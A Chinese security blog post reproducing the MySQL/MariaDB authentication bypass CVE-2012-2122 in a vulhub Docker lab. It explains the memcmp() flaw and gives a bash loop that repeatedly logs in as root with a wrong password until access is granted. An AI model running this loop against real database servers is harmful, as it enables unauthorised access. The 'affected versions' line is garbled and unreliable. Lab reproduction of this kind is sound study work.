MySQL 身份认证绕过漏洞(CVE-2012-2122)复现

水下月 2021-02-23
Web安全 发布于 2021-02-23 17:39:40 阅读 195 评论 0

漏洞原理

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

受影响版本:

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

启动环境

1,在自己的电脑虚拟机上用vulhub进入路径为 cd /root/vulhub/mysql/CVE-2012-2122
2,shu输入docker-compose build && docker-compose up -d

漏洞复现

在不知道我们环境正确密码的情况下,在bash下运行如下命令,在一定数量尝试后便可成功登录:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

进入SQL数据库后可执行SQL命令,select version();

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!